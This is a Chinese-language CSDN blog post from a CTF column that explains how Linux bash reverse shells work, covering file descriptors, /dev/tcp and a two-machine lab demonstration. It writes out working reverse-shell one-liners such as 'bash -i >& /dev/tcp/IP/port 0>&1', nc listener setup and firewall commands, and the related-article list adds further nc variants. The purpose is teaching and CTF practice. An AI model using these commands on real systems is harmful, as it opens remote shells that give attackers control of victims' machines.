Linux下反弹shell的原理

最新推荐文章于 2024-08-08 21:06:47 发布
最新推荐文章于 2024-08-08 21:06:47 发布
阅读量1.4k 收藏 3
点赞数 3
分类专栏: CTF专题 文章标签: linux bash 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57497184/article/details/123404378
版权
本文详细介绍了Linux下反弹shell的原理,通过bash-i>&/dev/tcp/攻击端IP/攻击端监听端口0>&1命令实现交互式shell的建立。文章还展示了如何在公网和本地环境中利用bash命令进行shell反弹,包括靶机和攻击机的配置与操作。通过实例演示了在Centos服务器上的操作,强调了防火墙配置、nc监听及文件描述符在反弹shell中的作用。
摘要由CSDN通过智能技术生成

Linux下反弹shell的原理-bash

shell是一种脚本语言,需要用解释器来解析这些脚本,常见的脚本解释器有:

bash-Linux标准默认的shell

sh-Unix标准默认的shell

shell是Linux的外壳,为用户和内核之间的交互提供了一个接口

反弹shell就是控制端监听在某TCP端口,别控端发起请求到该端口,并将其命令行的输入输出转到控制端

bash建立反弹shell

bash -i >& /dev/tcp/攻击端IP/攻击端监听端口 0>&1

bash -i >& /dev/tcp/101.43.119.212/12306 0>&1

  • 参数i用于打开交互式的shell > 输出重定向 &用于区分文件和文件描述符

>&+数字表示后面的数字是文件描述符,不加&会把后面的数字当成文件

>&+文件表示将标准输出重定向至文件

  • 文件描述符:0–标准输入重定向 1–标准输出重定向 2–标准错误输出重定向
  • /dev目录下的tcp、udp是Linux中的特殊设备可用于建立网络链接,读写这两个文件,就相当于在网络链接中传输数据
  • >& /dev/tcp/攻击端IP/攻击端监听端口 表示将标准输出和标准错误输出重定向到攻击机(这时目标机的执行结果可以从攻击机看到)
  • 0>&1 将标准输入重定向到标准输出-攻击机,从而可以通过攻击机输入命令

/dev/tcp/ip/port是一个特殊的文件,实际上可以将其看成一个设备(Linux下一切皆文件),其实如果你访问这个文件的位置他是不存在的。但是如果你在一方监听端口的情况下对这个文件进行读写,就能实现与监听端口的服务器的socket通信

公网攻击机反弹本地shell

本地反弹shell尝试:

  1. 攻击机:云端Centos服务器(公网IP:101.43.119.212:2002) 靶机:本地Centos服务器(192.168.182.134)

反弹shell过程:攻击机开启nc监听端口,靶机执行bash命令

攻击机主机端口开启2002监听从靶机bash进行shell反弹的内容

首先服务器放行2002端口用于监听
在这里插入图片描述

firewall-cmd --zone=public --add-port=2002/tcp --permanent
firewall-cmd --reload
nc -n -lvvp 2002

放行成功后开启监听

在这里插入图片描述

同时本地Centos靶机输入:

bash -i >& /dev/tcp/101.43.119.212/2002 0>&1

或者

bash -i > /dev/tcp/81.X.X.X/5432 0>&1 2>&1

若报错显示不存在该目录或者文件夹可以通过touch /dev/tcp创建

靶机运行
在这里插入图片描述

链接成功

在这里插入图片描述

输入命令进行执行:

在这里插入图片描述

反弹shell成功

本地攻击机反弹本地shell

攻击机:Windows netcat(192.168.43.200) 靶机:Centos(192.168.182.134)

操作同上
在这里插入图片描述

YKingH
关注
专栏目录
linux反弹shell原理详解
01-08
反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一...
Linux反弹shell方式总结
qq_43936524的博客
12-11 1090
文章目录bash反弹基础知识指令分析 bash反弹 反弹指令: bash -i >& /dev/tcp/ip/port 0>&1 反弹步骤: 在kail上开启7777侦听: nc -lvp 7777 在靶机上输入反弹指令即可反弹成功 基础知识 linux下有三个标准的文件描述符: 0 - stdin 代表标准输入,使用<或<< 1 - stdout 代表标准输出,使用>或>> 2 - stderr 代表标准错误输出,使用2>或2>
命令执行漏洞
qq_42307546的博客
01-20 1506
命令执行漏洞也称为rce,当应用调用一些外部程序就会用到一些系统命令的函数,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户输入的情况下,就会造成命令执行漏洞 相关函数 system(args)有回显 passthru(args)有c exec(args)回显最后一行-必须echo输出 shell_exec()无回显必须输出 代码分析 <?php /** * Created by runner.han * There is nothing new under the sun */
常见 反弹shell的方法
最新发布
qq_48368964的博客
08-08 1336
nc x.x.x.x 4444|/bin/bash|nc x.x.x.x 5555 #从4444端口获取到命令,bash 运行后将命令执行结果返回 5555 端口,攻击者主机上也是打开两个终端分别执行监听。#/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口。反弹shell成功后,在监听4444端口的终端中执行命令可以在另一个终端中看到命令执行结果。监听两个端口分别用来输入和输出,其中x.x.x.x均为攻击者ip。
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1227
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
linux反弹shell原理
weixin_44255856的博客
07-30 302
一直知道Linux反弹shell。但是不知道其原理所以今天学习了一波。 文件描述符 首先我们要明白文件描述符是什么? 文件描述符定义:文件描述符在形式上是一个非负整数。实际上,它是一个索引值,指向内核为每一个进程所维护的该进程打开文件的记录表。当程序打开一个现有文件或者创建一个新文件时,内核向进程返回一个文件描述符。在程序设计中,一些涉及底层的程序编写往往会围绕着文件描述符展开。但是文件描述符这一...
【学习笔记】反弹shell命令学习笔记,实战指南,1v1攻击测试教学,常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1
qq_37092496的博客
03-15 9101
文章目录 前言 为何给靶机发送这条执行命令就会自动连接到本地计算机,并且出发实时通讯机制(ps:有点类似oicq,前生就是用的这种模式开发的即时通讯) 作为渗透测试人员必备技能,反弹shell到底是什么原理,以及如何使用,本文是自己学习shell命令时的个人感悟和笔记,文章内容大量引入了较为官方的语言,给入门渗透学习的人员提供一个参考1 常用的反弹shell命令: bash -i >& /dev/tcp/vps的ip/vps的端口 0>&1 何为shell Shell 脚本(
Linux下渗透嗅探术
09-24
本文将详细探讨Linux下渗透嗅探的基本原理、常用工具和技术,以及如何安全地进行内网渗透测试。 #### 二、渗透嗅探的基础知识 渗透嗅探是指在网络环境中,通过监听和捕获网络流量来获取敏感信息或进一步探索网络...
AWD比赛各类必备脚本
07-09
6. **反弹Shell**:通过控制受害主机向攻击者的服务器建立连接,实现远程控制。这需要理解TCP/IP协议栈,熟悉如何构造反向连接payload。 7. **后台flag读取**:在AWD比赛中,"flag"通常代表关键信息,需要在不被...
内网渗透综合实验.docx
08-29
内网渗透综合实验 ...本文档主要讲解了内网渗透综合实验的相关知识点,包括内网通信、隧道通信、Powercat 和 nc 反弹 shell、DNS 隧道、ssh 隧道等,旨在帮助读者更好地理解和掌握内网渗透的技术和原理
(网络安全方向)python实现NIDS的相关功能
07-31
2、针对命令行输出异常检测,如:CC攻击,SYN_Flood,CPU进程负载异常,反弹shell 3、针对敏感目录下的文件增删改操作检测和重要文件安全配置项检测 4、数据库存储预警信息 5、基于python的flask框架实现web界面...
2021年江苏省职业院校技能大赛-网络信息安全赛项试卷-学生组V4(1).docx
07-09
- 木马与反制:理解反弹shell原理,会使用MSF(Metasploit Framework)进行监听和控制。 - 团队协作:在分组对抗中,需要良好的沟通和协同作战能力。 此赛项全面检验了中职学生的网络安全实战技能,有助于培养他们...
CTF6靶机实战.zip
05-25
参赛者需要了解文件上传漏洞的原理,如MIME类型检查绕过、目录遍历等,并学习如何构造有效载荷来触发这个反弹shell。 "8478.sh"文件可能包含了一个针对特定系统版本的漏洞利用脚本,数字8478可能是CVE编号或者是...
《安天365安全研究》第二期.pdf
08-07
目录 第 1 部分拟研究技术专题 1.1《黑客攻防实战——web 漏洞挖掘...2.14Linux(CentOS)安全加固之非业务端口服务关闭 2.14.1 查找端口对应的服务进程 2.14.2 查找进程对应的服务 2.14.3 停用进程服务 2.14.4 学习小结
【转】Linuxbash反弹shell原理浅析
mastergu2的博客
11-04 2234
    环境 攻击机:kali            ip:192.168.25.144 靶    机:centos      ip:192.168.25.142   过程 kali 监听本地8888端口 靶机 centos 写入 反弹shell 的命令 bash -i >& /dev/tcp...
反弹shell原理
m0_63615772的博客
04-26 1851
假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标IP:目标端口),这是比较常规的形式,我们叫做正向连接。远程桌面,ssh,web服务,smb等等那么什么情况下正向连接不太好用了?(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。它的IP会动态改变,你不能持续控制。(2)由于防火墙或局域网的限制,对方机器只能发送请求,不能主动请求。
Linux反弹Shell
m0_73199983的博客
03-06 1349
被控端主动发起连接请求连接控制,通常被控制端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收送过来的数据包。被控端bash -i>&/dev/tcp/192.168.81.154(控制端IP)/6666 (控制端想要开放的端口号)0>&1bash -i打开一个交互式的bash shell。>&或者&>>&、&>:混合输出(正确、错误的输出都输出到一个地方),将标准输出、错误输出全都重定向到 /dev/tcp/HOST/PORT,即控制端如果不想用>&或者。
Linux Bash反弹shell原理详解与操作过程
本文主要探讨了Linux环境下利用bash反弹shell技术,该技术在攻击者无法直接连接到受害者机器时,通过让受害者主动连接到攻击者设置的端口来实现远程控制。本文以一个具体的场景为例,涉及攻击机(Kali Linux)和...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值